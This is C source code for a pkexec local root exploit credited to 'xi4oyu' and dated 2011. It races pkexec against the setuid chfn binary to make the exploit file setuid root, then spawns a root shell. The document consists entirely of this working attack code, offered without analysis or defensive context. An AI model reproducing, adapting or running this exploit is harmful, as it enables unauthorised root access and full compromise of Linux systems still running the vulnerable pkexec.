#include <stdio.h>#include <limits.h>#include <time.h>#include <unistd.h>

1. #include <stdio.h>
2. #include <limits.h>
3. #include <time.h>
4. #include <unistd.h>
5. #include <termios.h>
6. #include <sys/stat.h>
7. #include <errno.h>
8. #include <poll.h>
9. #include <sys/types.h>
10. #include <stdlib.h>
11. #include <string.h>
12.  
13.  
14.  
15. int main(int argc,char *argv[], char ** envp)
16. {
17.  
18. time_t tim_seed1;
19. pid_t pid_seed2;
20. int result;
21. struct stat stat_buff;
22.  
23. char * chfn_path = "/usr/bin/chfn";
24. char cmd_buff[4096];
25.  
26. char * pkexec_argv[] = {
27. "/usr/bin/pkexec",
28. "/bin/sh",
29. "-c",
30. cmd_buff,
31. NULL
32. };
33. int pipe1[2];
34. int pipe2[2];
35. int pipe3[2];
36. pid_t pid,pid2 ;
37. char * chfn_argv[] = {
38. "/usr/bin/chfn",
39. NULL
40. };
41.  
42. char buff[8];
43. char read_buff[4096];
44. char real_path[512];
45. struct termios termios_p;
46.  
47. int count = 0;
48. int flag = 0;
49. int usleep1 = 0;
50. int usleep2 = 0;
51.  
52.  
53. bzero(cmd_buff,4096);
54. bzero(real_path,512);
55. realpath(argv[0],real_path);
56.  
57. tim_seed1 = time(NULL);
58. pid_seed2 = getpid();
59. srand(tim_seed1+pid_seed2);
60.  
61.  
62.  
63.  
64. //get terminal attr
65. tcgetattr(0,&termios_p);
66. snprintf(cmd_buff,4095,"/bin/chown root:root %s; /bin/chmod 4755 %s",real_path,real_path);
67. // printf("Cmd line:%s",cmd_buff);
68. if(! geteuid()){
69. //Succs => r00t!
70. char * exec_argv[2]={
71. "/bin/sh",
72. NULL
73. };
74. setuid(0);
75. setgid(0);
76. execve("/bin/sh",exec_argv,0);
77. perror("execve shell");
78. exit(-1);
79. }
80.  
81. printf("pkexec local root exploit by xi4oyu , thx to dm\n");
82.  
83. if(pipe(pipe1)){
84. perror("pipe");
85. exit(-2);
86. }
87.  
88. for(count = 500; count && !flag; count--){
89.  
90. // printf("Count %d\n",count);
91. pid = fork();
92. if( !pid ){
93. // Parent
94. if( !pipe(pipe2)){
95.  
96. if(!pipe(pipe3)){
97. pid2 = fork();
98. if(!pid2){
99. // Parent 2
100. close(1);
101. close(2);
102. close(pipe1[0]);
103. dup2(pipe1[1],2);
104. dup2(pipe1[1],1);
105. close(pipe1[1]);
106. close(pipe2[0]);
107. close(pipe3[1]);
108. write(pipe2[1],"\xFF",1);
109. read(pipe3[0],&buff,1);
110.  
111. execve(pkexec_argv[0],pkexec_argv,envp);
112. perror("execve pkexec");
113. exit(-3);
114.  
115. }
116. close(0);
117. close(1);
118. close(2);
119. close(pipe2[1]);
120. close(pipe3[0]);
121. read(pipe2[0],&buff,1);
122. write(pipe3[1],"\xFF",1);
123. usleep(usleep1+usleep2);
124.  
125. execve(chfn_argv[0],chfn_argv,envp);
126. perror("execve setuid");
127. exit(1);
128. }
129.  
130.  
131. }
132. perror("pipe3");
133. exit(1);
134. }
135.  
136. //Note: This is child, no pipe3 we use poll to monitor pipe1[0]
137. memset(pipe3,0,8);
138.  
139. struct pollfd * pollfd = (struct pollfd *)(&pipe3);
140. pollfd->fd = pipe1[0];
141. pollfd->events = POLLRDNORM;
142.  
143. if(poll(pollfd,1,1000) < 0){
144.  
145. perror("poll");
146. exit(1);
147. }
148.  
149. if(pollfd->revents & POLLRDNORM ){
150. memset(read_buff,0,4096);
151. read(pipe1[0],read_buff,4095);
152. if( strstr(read_buff,"does not match")){
153. usleep1 += 500;
154. usleep2 = rand() % 1000;
155.  
156. }else{
157. usleep1 -= 500;
158.  
159.  
160. }
161.  
162.  
163. }
164.  
165. if(!stat(real_path,&stat_buff)){
166. if(!stat_buff.st_uid){
167. if(!stat_buff.st_gid){
168. if(stat_buff.st_mode & 0x800){
169.  
170. char *exec_array[]={
171. real_path,
172. NULL
173. };
174.  
175. flag = 1;
176. tcsetattr(0,2,&termios_p);
177. execve(real_path,exec_array,0);
178. perror("execve self");
179. exit(1);
180. }
181. }
182.  
183. }
184. }
185.  
186. tcsetattr(0,2,&termios_p);
187.  
188. }
189. result = 0;
190. return result;
191.  
192. }
193.  
194.  
195. # [2011-10-08]
196.